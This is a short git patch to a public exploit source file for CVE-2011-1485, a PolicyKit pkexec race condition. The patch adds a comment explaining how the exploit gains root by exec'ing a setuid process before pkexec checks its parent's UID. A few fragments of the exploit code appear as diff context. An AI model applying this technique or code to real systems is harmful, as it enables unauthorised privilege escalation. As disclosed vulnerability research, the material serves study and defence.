From 164b5dfcbe58cd5cb813372d89088b71d3d9e7de Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld" <Jason@zx2c4.com>
Date: Fri, 2 Sep 2011 18:50:53 -0400
Subject: Add message.

---
 pkexec.c | 14 +++++++++++++-
 1 file changed, 13 insertions(+), 1 deletion(-)

diff --git a/pkexec.c b/pkexec.c
index b0c1f0e..56b28b9 100644
--- a/pkexec.c
+++ b/pkexec.c
@@ -1,3 +1,16 @@
+/*
+ * Howdy folks. This exploits CVE-2011-1485, a race condition in PolicyKit.
+ * pkexec determines the UID of its parent by checking the UID of /proc/PID.
+ * What they really want to be checking is the EUID but this doesn't do it,
+ * so the following exploit wins the race by execl'ing to a suid process
+ * just as pkexec is about to check the UID of the parent process. Greets
+ * to djrbliss.
+ *
+ * - zx2c4
+ * 2-sept-2011
+ *
+ */
+
 
 #include <stdio.h>
 #include <stdlib.h>
@@ -19,7 +32,6 @@ int main(int argc, char **argv)
 		char pid_path[1024];
 		sprintf(pid_path, "/proc/%i", getpid());
 		printf("[+] Configuring inotify for proper pid.\n");
-
 		close(0); close(1); close(2);
 		fd = inotify_init();
 		if (fd < 0)
-- 
cgit v1.2.3-59-g8ed1b